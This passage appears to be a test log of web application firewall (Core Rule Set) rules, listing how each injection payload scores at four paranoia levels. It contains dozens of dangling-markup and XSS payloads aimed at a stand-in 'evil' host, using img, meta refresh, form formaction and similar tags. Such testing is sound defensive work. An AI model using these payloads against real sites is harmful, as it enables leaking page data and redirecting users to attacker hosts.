920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942511 SQLi bypass attempt by ticks detected.
Total Incoming Score: 79
--- Paranoia Level 4 ---
941380 AngularJS client side template injection detected
942490 Detects classic SQL injection probings 3/3
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
942370 PL2 Detects classic SQL injection probings 2/3
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
941340 PL2 IE XSS Filters - Attack Detected.
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942150 PL2 SQL Injection Attack
942410 PL2 SQL Injection Attack
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942511 SQLi bypass attempt by ticks detected.
Total Incoming Score: 92
****** payload-186 ********
Payload:
payload=<body background="//evil?
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
Total Incoming Score: 5
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 10
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
932190 Remote Command Execution: Wildcard bypass technique attempt
Total Incoming Score: 28
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
932190 Remote Command Execution: Wildcard bypass technique attempt
Total Incoming Score: 41
****** payload-187 ********
Payload:
payload=<table background="//evil?
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
Total Incoming Score: 5
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 10
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
932190 Remote Command Execution: Wildcard bypass technique attempt
Total Incoming Score: 28
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
932190 Remote Command Execution: Wildcard bypass technique attempt
Total Incoming Score: 41
****** payload-188 ********
Payload:
payload=<table><thead background="//evil?
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
Total Incoming Score: 5
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 10
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
932190 Remote Command Execution: Wildcard bypass technique attempt
Total Incoming Score: 28
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
932190 Remote Command Execution: Wildcard bypass technique attempt
Total Incoming Score: 41
****** payload-189 ********
Payload:
payload=<table><tbody background="//evil?
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
Total Incoming Score: 5
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 10
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
932190 Remote Command Execution: Wildcard bypass technique attempt
Total Incoming Score: 28
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
932190 Remote Command Execution: Wildcard bypass technique attempt
Total Incoming Score: 41
****** payload-190 ********
Payload:
payload=<table><tfoot background="//evil?
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
Total Incoming Score: 5
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 10
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
932190 Remote Command Execution: Wildcard bypass technique attempt
Total Incoming Score: 28
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
932190 Remote Command Execution: Wildcard bypass technique attempt
Total Incoming Score: 41
****** payload-191 ********
Payload:
payload=<table><td background="//evil?
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
Total Incoming Score: 5
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 10
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
932190 Remote Command Execution: Wildcard bypass technique attempt
Total Incoming Score: 28
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
932190 Remote Command Execution: Wildcard bypass technique attempt
Total Incoming Score: 41
****** payload-192 ********
Payload:
payload=<table><th background="//evil?</a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
Total Incoming Score: 5
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 15
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
932190 Remote Command Execution: Wildcard bypass technique attempt
Total Incoming Score: 36
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
932190 Remote Command Execution: Wildcard bypass technique attempt
Total Incoming Score: 49
****** payload-193 ********
Payload:
payload=<meta http-equiv="refresh" content="0; http://evil?</a>
--- Paranoia Level 1 ---
921130 PL1 HTTP Response Splitting Attack
941250 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 25
--- Paranoia Level 2 ---
921130 PL1 HTTP Response Splitting Attack
941250 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 35
--- Paranoia Level 3 ---
921130 PL1 HTTP Response Splitting Attack
941250 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
932190 Remote Command Execution: Wildcard bypass technique attempt
Total Incoming Score: 53
--- Paranoia Level 4 ---
921130 PL1 HTTP Response Splitting Attack
941250 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
932190 Remote Command Execution: Wildcard bypass technique attempt
Total Incoming Score: 66
****** payload-194 ********
Payload:
payload=<img src="//evil?
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
Total Incoming Score: 5
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 15
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
932190 Remote Command Execution: Wildcard bypass technique attempt
Total Incoming Score: 33
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
932190 Remote Command Execution: Wildcard bypass technique attempt
Total Incoming Score: 46
****** payload-195 ********
Payload:
payload=<image src="//evil?</a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
Total Incoming Score: 5
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
Total Incoming Score: 15
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
932190 Remote Command Execution: Wildcard bypass technique attempt
Total Incoming Score: 33
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
932190 Remote Command Execution: Wildcard bypass technique attempt
Total Incoming Score: 46
****** payload-196 ********
Payload:
payload=<video><track default src="//evil?</a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
Total Incoming Score: 5
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
Total Incoming Score: 15
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
932190 Remote Command Execution: Wildcard bypass technique attempt
Total Incoming Score: 36
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
932190 Remote Command Execution: Wildcard bypass technique attempt
Total Incoming Score: 49
****** payload-197 ********
Payload:
payload=<video><source src="//evil?</a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
Total Incoming Score: 5
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
Total Incoming Score: 15
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
932190 Remote Command Execution: Wildcard bypass technique attempt
Total Incoming Score: 36
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
932190 Remote Command Execution: Wildcard bypass technique attempt
Total Incoming Score: 49
****** payload-198 ********
Payload:
payload=<audio><source src="//evil?</a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
Total Incoming Score: 5
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
Total Incoming Score: 15
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
932190 Remote Command Execution: Wildcard bypass technique attempt
Total Incoming Score: 36
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
932190 Remote Command Execution: Wildcard bypass technique attempt
Total Incoming Score: 49
****** payload-199 ********
Payload:
payload=<input type=image src="//evil?</a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
Total Incoming Score: 5
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 20
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
932190 Remote Command Execution: Wildcard bypass technique attempt
Total Incoming Score: 41
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
932190 Remote Command Execution: Wildcard bypass technique attempt
Total Incoming Score: 54
****** payload-200 ********
Payload:
payload=<form><button style="width:100%;height:100%" type=submit formaction="//evil?</a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
920240 PL1 URL Encoding Abuse Attack Attempt
941100 PL1 XSS Attack Detected via libinjection
941130 PL1 XSS Filter - Category 3: Attribute Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 23
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
920240 PL1 URL Encoding Abuse Attack Attempt
941100 PL1 XSS Attack Detected via libinjection
941130 PL1 XSS Filter - Category 3: Attribute Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 41
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
920240 PL1 URL Encoding Abuse Attack Attempt
941100 PL1 XSS Attack Detected via libinjection
941130 PL1 XSS Filter - Category 3: Attribute Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
932190 Remote Command Execution: Wildcard bypass technique attempt
Total Incoming Score: 62
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
920240 PL1 URL Encoding Abuse Attack Attempt
941100 PL1 XSS Attack Detected via libinjection
941130 PL1 XSS Filter - Category 3: Attribute Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
932190 Remote Command Execution: Wildcard bypass technique attempt
Total Incoming Score: 75
****** payload-201 ********
Payload:
payload=<form><input type=submit value="XSS" style="width:100%;height:100%" type=submit formaction="//evil?</a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
920240 PL1 URL Encoding Abuse Attack Attempt
941100 PL1 XSS Attack Detected via libinjection
941130 PL1 XSS Filter - Category 3: Attribute Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 23
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
920240 PL1 URL Encoding Abuse Attack Attempt
941100 PL1 XSS Attack Detected via libinjection
941130 PL1 XSS Filter - Category 3: Attribute Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 41
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
920240 PL1 URL Encoding Abuse Attack Attempt
941100 PL1 XSS Attack Detected via libinjection
941130 PL1 XSS Filter - Category 3: Attribute Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
932190 Remote Command Execution: Wildcard bypass technique attempt
Total Incoming Score: 62
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
920240 PL1 URL Encoding Abuse Attack Attempt
941100 PL1 XSS Attack Detected via libinjection
941130 PL1 XSS Filter - Category 3: Attribute Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
932190 Remote Command Execution: Wildcard bypass technique attempt
Total Incoming Score: 75
****** payload-202 ********
Payload:
payload=<button form=x style="width:100%;height:100%;"><form id=x action="//evil?</a>
--- Paranoia Level 1 ---
